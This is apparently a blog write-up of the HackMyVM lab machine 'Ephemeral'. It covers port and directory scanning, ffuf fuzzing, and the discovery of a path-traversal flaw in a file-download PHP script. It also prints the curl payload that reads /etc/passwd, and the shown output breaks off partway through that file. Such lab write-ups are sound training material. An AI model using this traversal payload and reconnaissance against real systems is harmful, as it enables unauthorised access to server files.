{"id":667,"date":"2024-04-30T17:42:16","date_gmt":"2024-04-30T09:42:16","guid":{"rendered":"http:\/\/162.14.82.114\/?p=667"},"modified":"2024-04-30T17:42:16","modified_gmt":"2024-04-30T09:42:16","slug":"hmv-_-ephemeral","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/667\/04\/30\/2024\/","title":{"rendered":"hmv[-_-]Ephemeral"},"content":{"rendered":"<h1>Ephemeral<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740578.png\" alt=\"image-20240430135221500\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740579.png\" alt=\"image-20240430135528314\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ rustscan -a 192.168.0.148 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.148:21\nOpen 192.168.0.148:22\nOpen 192.168.0.148:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 0a:0d:44:3c:38:8f:c0:6d:5d:72:18:e6:d9:12:3e:57 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCp0CHgyqyNh4SkWN3U\/RBNxdPfxovfPkv76iLRZaLvvoYM2W1QUsOoH3YaXmKj9FpHpkrc4EGy2OlOCqVVCy4XxagSyLuM1d0r\/lHExM130qQ3RGmw3UBIQ2QW3gkk9rVKAD0Rq6QIXA4WMC5fIqbCPtO8bVOUBOYQcMB9LqvZnq\/U6YTWFswBwLUnz3hC9+swoJf1bPduvsnlsAh0fbq11hDwf07K8N909uq7deZFpW8tHc9CBbV36XNP9ZBTrzkAY34dd+HdYLfFwYTDwcNY\/IeiA5Fda9rrJ3CrHJWhiSEZmRSiNHKbpIVhEItOCGL2CiV9xKQ8I9S49oHSxmnegfDn44kPC\/Q7pSg1zi3uOynExvnvrFiRdmcHNUJan6J42eRXMKXhz2HF0w4MJMvSkfXCOqYI+AOT30DSri8cAbJ22wkBoMqdHqPxphRar3Vi7P\/Dd0hphcEd6W8Cc4Q4qWgUu7ZLeWexLm1Q1y+34c\/ZOh1FbeQdpKMlvyUyPCc=\n|   256 4d:7d:ba:6f:a9:88:ea:a2:34:3a:6a:0c:3a:27:1c:d5 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCqt1OTJw7IiSOOAgyywjGQ1SOmIaKCP8n20uHpYR9p05bmivNL3gZprRJHVT4zYbGNE6ww8Ijq7\/XVXL5DK\/kU=\n|   256 74:36:bf:af:8a:53:0a:c1:7f:ca:2e:a1:5c:c5:25:ad (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOlgxVeTDNdBhlFLjaLPbFFsOyH6868QxDj7wfXzjgaW\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-title: AutoWash - Car Wash Website Template\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Discovery<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.148\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer 
(@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.148\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,php,zip,bak,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 39494]\n\/contact.html         (Status: 200) [Size: 15151]\n\/img                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.148\/img\/]\n\/about.html           (Status: 200) [Size: 18464]\n\/blog.html            (Status: 200) [Size: 20094]\n\/mail                 (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.0.148\/mail\/]\n\/service.html         (Status: 200) [Size: 16853]\n\/css                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.148\/css\/]\n\/team.html            (Status: 200) [Size: 18605]\n\/lib                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.148\/lib\/]\n\/js                   (Status: 301) [Size: 311] [--&gt; http:\/\/192.168.0.148\/js\/]\n\/cd                   (Status: 301) [Size: 311] [--&gt; http:\/\/192.168.0.148\/cd\/]\n\/location.html        (Status: 200) [Size: 14685]\n\/price                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.148\/price\/]\n\/price.html           (Status: 200) [Size: 14635]\n\/prices               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.148\/prices\/]\n\/LICENSE.txt          (Status: 200) [Size: 1309]\n\/single.html          (Status: 200) [Size: 48856]\n\/booking.html         
(Status: 200) [Size: 14677]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/phpsysinfo.php       (Status: 200) [Size: 69419]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740580.png\" alt=\"image-20240430135938274\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740581.png\" alt=\"image-20240430140010829\" style=\"zoom: 33%;\" \/><\/p>\n<h3>Sensitive Directories<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ http get http:\/\/192.168.0.148\/         \nHTTP\/1.1 200 OK\nAccept-Ranges: bytes\nConnection: Keep-Alive\nContent-Encoding: gzip\nContent-Length: 4290\nContent-Type: text\/html\nDate: Tue, 30 Apr 2024 06:03:16 GMT\nETag: &quot;9a46-5b171bffcf480-gzip&quot;\nKeep-Alive: timeout=5, max=100\nLast-Modified: Mon, 12 Oct 2020 04:29:54 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nVary: Accept-Encoding\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ curl -s -i http:\/\/192.168.0.148\/ | grep &quot;hmv&quot;\n<\/code><\/pre>\n<p>It keeps failing to load, so try something else first:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ curl -s -i http:\/\/192.168.0.148\/blog.html | html2text | uniq\nHTTP\/1.1 200 OK Date: Tue, 30 Apr 2024 06:05:04 GMT Server: Apache\/2.4.41\n(Ubuntu) Last-Modified: Mon, 12 Oct 2020 04:26:44 GMT ETag: &quot;4e7e-\n5b171b4a9c900&quot; Accept-Ranges: bytes Content-Length: 20094 Vary: Accept-Encoding\nContent-Type: text\/html\n\n******_AutoWash_******\n**** Opening Hour ****\nMon - Fri, 8:00 - 9:00\n**** Call Us ****\n+012 345 6789\n**** Email Us ****\ninfo@example.com\n\n MENU\nHome About Service Price Washing_Points\nPages\nBlog_Grid Detail_Page Team_Member Schedule_Booking\nContact\nGet_Appointment\n\n***** Blog Grid *****\nHome Blog\n\nOur Blog\n***** Latest news &amp; articles *****\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. 
Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n    * Previous\n    * 1\n    * 2\n    * 3\n    * Next\n\n***** Get In Touch *****\n123 Street, New York, USA\n+012 345 67890\ninfo@example.com\n\n***** Popular Links *****\nAbout Us Contact Us Our Service Service Points Pricing Plan\n***** Useful Links *****\nTerms of use Privacy policy Cookies Help FQAs\n***** Newsletter *****\n[                    ] [                    ] Submit\n\u00a9 Your_Site_Name, All Right Reserved. 
Designed By HTML_Codex<\/code><\/pre>\n<pre><code class=\"language-text\">http:\/\/192.168.0.148\/price.html<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740582.png\" alt=\"image-20240430141137751\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.0.148\/phpsysinfo.php<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740583.png\" alt=\"image-20240430141245321\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740585.png\" alt=\"image-20240430143043243\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740586.png\" alt=\"image-20240430141608085\" style=\"zoom: 67%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740587.png\" alt=\"image-20240430141644554\" style=\"zoom:50%;\" \/><\/p>\n<p>Tried looking into the related vulnerabilities, but to no avail; try brute-forcing the subdirectories instead:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ feroxbuster -u http:\/\/192.168.0.148\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 3 -s 200 301 302\n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.10.2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.0.148\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 301, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.10.2\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 3\n \ud83c\udf89  New Version Available \u2502 
https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n301      GET        9l       28w      312c http:\/\/192.168.0.148\/img =&gt; http:\/\/192.168.0.148\/img\/\n200      GET      125l      806w    65020c http:\/\/192.168.0.148\/img\/blog-2.jpg\n200      GET       65l      166w     2598c http:\/\/192.168.0.148\/mail\/contact.js\n301      GET        9l       28w      313c http:\/\/192.168.0.148\/mail =&gt; http:\/\/192.168.0.148\/mail\/\n301      GET        9l       28w      312c http:\/\/192.168.0.148\/css =&gt; http:\/\/192.168.0.148\/css\/\n301      GET        9l       28w      312c http:\/\/192.168.0.148\/lib =&gt; http:\/\/192.168.0.148\/lib\/\n200      GET      168l      960w     4092c http:\/\/192.168.0.148\/lib\/easing\/easing.js\n200      GET        1l       38w     2303c http:\/\/192.168.0.148\/lib\/easing\/easing.min.js\n200      GET       11l      188w    16964c http:\/\/192.168.0.148\/lib\/animate\/animate.min.css\n200      GET        0l        0w        0c http:\/\/192.168.0.148\/lib\/waypoints\/links.php\n301      GET        9l       28w      311c http:\/\/192.168.0.148\/js =&gt; http:\/\/192.168.0.148\/js\/\n200      GET      130l      236w     3347c http:\/\/192.168.0.148\/js\/main.js\n301      GET        9l       28w      311c http:\/\/192.168.0.148\/cd =&gt; 
http:\/\/192.168.0.148\/cd\/\n301      GET        9l       28w      314c http:\/\/192.168.0.148\/price =&gt; http:\/\/192.168.0.148\/price\/\n301      GET        9l       28w      315c http:\/\/192.168.0.148\/prices =&gt; http:\/\/192.168.0.148\/prices\/\n200      GET        0l        0w        0c http:\/\/192.168.0.148\/prices\/filedownload.php\n200      GET       86l      492w    39976c http:\/\/192.168.0.148\/img\/blog-1.jpg\n200      GET       16l       66w     5067c http:\/\/192.168.0.148\/img\/testimonial-1.jpg\n200      GET       42l      112w     1327c http:\/\/192.168.0.148\/lib\/flaticon\/font\/flaticon.css\n200      GET      293l      688w    14685c http:\/\/192.168.0.148\/location.html\n200      GET       20l      106w     7346c http:\/\/192.168.0.148\/img\/testimonial-3.jpg\n200      GET      214l     1439w   143119c http:\/\/192.168.0.148\/img\/carousel-3.jpg\n200      GET        7l      279w    42766c http:\/\/192.168.0.148\/lib\/owlcarousel\/owl.carousel.min.js\n200      GET     2056l     3970w    38262c http:\/\/192.168.0.148\/css\/style.css\n200      GET       84l      436w    33981c http:\/\/192.168.0.148\/img\/team-4.jpg\n200      GET        6l       47w     4281c http:\/\/192.168.0.148\/img\/testimonial-4.jpg\n200      GET        6l       64w     2936c http:\/\/192.168.0.148\/lib\/owlcarousel\/assets\/owl.carousel.min.css\n200      GET      767l     1986w    39494c http:\/\/192.168.0.148\/index.html\n200      GET       15l       85w     6525c http:\/\/192.168.0.148\/img\/testimonial-2.jpg\n200      GET      379l     1032w    20094c http:\/\/192.168.0.148\/blog.html\n200      GET      758l     2363w    48856c http:\/\/192.168.0.148\/single.html\n200      GET      101l      553w    40061c http:\/\/192.168.0.148\/img\/team-2.jpg\n200      GET      293l      687w    14677c http:\/\/192.168.0.148\/booking.html\n200      GET       52l      421w    31803c http:\/\/192.168.0.148\/img\/team-1.jpg\n200      GET      290l      682w    14635c 
http:\/\/192.168.0.148\/price.html\n200      GET        1l        1w     1360c http:\/\/192.168.0.148\/lib\/flaticon\/backup.txt\n200      GET      291l      705w    15151c http:\/\/192.168.0.148\/contact.html\n200      GET        1l      245w    14877c http:\/\/192.168.0.148\/mail\/jqBootstrapValidation.min.js\n200      GET      340l      910w    16853c http:\/\/192.168.0.148\/service.html\n200      GET       78l      460w    35288c http:\/\/192.168.0.148\/img\/blog-3.jpg\n200      GET       11l       56w     2406c http:\/\/192.168.0.148\/lib\/counterup\/counterup.min.js\n200      GET      377l      893w    18464c http:\/\/192.168.0.148\/about.html\n200      GET      366l      857w    18605c http:\/\/192.168.0.148\/team.html\n200      GET      199l     1296w   122966c http:\/\/192.168.0.148\/img\/carousel-2.jpg\n200      GET        7l      158w     9028c http:\/\/192.168.0.148\/lib\/waypoints\/waypoints.min.js\n200      GET      296l     1708w   148853c http:\/\/192.168.0.148\/img\/about.jpg\n200      GET      241l     1306w   111758c http:\/\/192.168.0.148\/img\/carousel-1.jpg\n200      GET       73l      388w    29305c http:\/\/192.168.0.148\/img\/team-3.jpg\n200      GET       16l       84w     7150c http:\/\/192.168.0.148\/img\/post-3.jpg\n200      GET       20l       98w     7813c http:\/\/192.168.0.148\/img\/post-5.jpg\n200      GET       19l      116w     7958c http:\/\/192.168.0.148\/img\/post-4.jpg\n200      GET      469l     2466w   189485c http:\/\/192.168.0.148\/img\/single.jpg\n200      GET      319l     1812w   123171c http:\/\/192.168.0.148\/img\/page-header.jpg\n200      GET       18l       76w     6428c http:\/\/192.168.0.148\/img\/user.jpg\n200      GET       18l       83w     5996c http:\/\/192.168.0.148\/img\/post-1.jpg\n200      GET       15l      116w     9206c http:\/\/192.168.0.148\/img\/post-2.jpg\n200      GET      767l     1986w    39494c http:\/\/192.168.0.148\/\n200      GET     1579l     2856w    25427c 
http:\/\/192.168.0.148\/lib\/animate\/animate.css\n200      GET       23l      172w     1090c http:\/\/192.168.0.148\/lib\/owlcarousel\/LICENSE\n200      GET     3275l     9533w    85368c http:\/\/192.168.0.148\/lib\/owlcarousel\/owl.carousel.js\n[####################] - 82s   220661\/220661  0s      found:60      errors:0      \n[####################] - 81s   220546\/220546  2716\/s  http:\/\/192.168.0.148\/ \n[####################] - 3s    220546\/220546  78992\/s http:\/\/192.168.0.148\/img\/ =&gt; Directory listing\n[####################] - 3s    220546\/220546  66052\/s http:\/\/192.168.0.148\/mail\/ =&gt; Directory listing\n[####################] - 3s    220546\/220546  65405\/s http:\/\/192.168.0.148\/css\/ =&gt; Directory listing\n[####################] - 3s    220546\/220546  70417\/s http:\/\/192.168.0.148\/lib\/ =&gt; Directory listing\n[####################] - 3s    220546\/220546  70327\/s http:\/\/192.168.0.148\/lib\/animate\/ =&gt; Directory listing\n[####################] - 3s    220546\/220546  70620\/s http:\/\/192.168.0.148\/lib\/easing\/ =&gt; Directory listing\n[####################] - 3s    220546\/220546  63963\/s http:\/\/192.168.0.148\/lib\/waypoints\/ =&gt; Directory listing\n[####################] - 4s    220546\/220546  62620\/s http:\/\/192.168.0.148\/lib\/counterup\/ =&gt; Directory listing\n[####################] - 3s    220546\/220546  63121\/s http:\/\/192.168.0.148\/lib\/owlcarousel\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  27568250\/s http:\/\/192.168.0.148\/js\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  18378833\/s http:\/\/192.168.0.148\/cd\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  13784125\/s http:\/\/192.168.0.148\/price\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  10024818\/s http:\/\/192.168.0.148\/prices\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  2100438\/s 
http:\/\/192.168.0.148\/lib\/flaticon\/ =&gt; Directory listing<\/code><\/pre>\n<p>Tried several of the directories without finding anything, so FUZZ is the next step:<\/p>\n<p>The sensitive directories are roughly as follows:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740588.png\" alt=\"image-20240430150538189\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740589.png\" alt=\"image-20240430150639493\" style=\"zoom:50%;\" \/><\/p>\n<p>Nothing came of that either; there is also a sensitive PHP file:<\/p>\n<pre><code 
class=\"language-bash\">http:\/\/192.168.0.148\/prices\/filedownload.php<\/code><\/pre>\n<p>It returns nothing, but it can be fuzzed.<\/p>\n<h3>FUZZ<\/h3>\n<p>Try adding a hosts (DNS) entry and fuzzing:<\/p>\n<pre><code class=\"language-text\">192.168.0.148   ephemeral.hmv<\/code><\/pre>\n<p>Try fuzzing:<\/p>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/ephemeral.hmv -H &quot;HOST: FUZZ.ephemeral.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt \nffuf -u http:\/\/ephemeral.hmv -H &quot;HOST: FUZZ.ephemeral.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -fw 19456\nffuf -u http:\/\/ephemeral.hmv -H &quot;HOST: FUZZ.ephemeral.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fw 19456\nffuf -u http:\/\/ephemeral.hmv -H &quot;HOST: ephemeral.FUZZ.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fw 19456\nffuf -u http:\/\/ephemeral.hmv -H &quot;HOST: ephemeral.hmv.FUZZ&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fw 19456<\/code><\/pre>\n<p>Still no results, so try fuzzing for an LFI vulnerability instead. This box really is a bit nasty, mainly because of the wordlist; see vcr..<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740590.png\" alt=\"image-20240430151115213\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Ephemeral]\n\u2514\u2500# ffuf -w \/usr\/share\/seclists\/Discovery\/Web-Content\/burp-parameter-names.txt -u http:\/\/192.168.0.148\/prices\/filedownload.php?FUZZ=..\/..\/..\/..\/..\/etc\/passwd -fs 0\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.0.148\/prices\/filedownload.php?FUZZ=..\/..\/..\/..\/..\/etc\/passwd\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/Web-Content\/burp-parameter-names.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 0\n________________________________________________\n\nAssignmentForm          [Status: 200, Size: 3091, Words: 40, Lines: 54, Duration: 121ms]\n:: Progress: [6453\/6453] :: Job [1\/1] :: 59 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::<\/code><\/pre>\n<p>Now you can see where the nastiness is:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404301740591.png\" alt=\"image-20240430150909124\" style=\"zoom:50%;\" \/><\/p>\n<p>There is exactly one hit; no idea how the other folks did it.... Go ahead and include the file!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Ephemeral]\n\u2514\u2500# curl -s -i http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=..\/..\/..\/..\/..\/etc\/passwd\nHTTP\/1.1 200 OK\nDate: Tue, 30 Apr 2024 07:12:59 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 3091\nContent-Type: text\/html; charset=UTF-8\n\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting 
System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:114::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:115::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:109:116:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nusbmux:x:110:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nrtkit:x:111:117:RealtimeKit,,,:\/proc:\/usr\/sbin\/nologin\ndnsmasq:x:112:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\ncups-pk-helper:x:113:120:user for cups-pk-helper service,,,:\/home\/cups-pk-helper:\/usr\/sbin\/nologin\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:\/run\/speech-dispatcher:\/bin\/false\navahi:x:115:121:Avahi mDNS 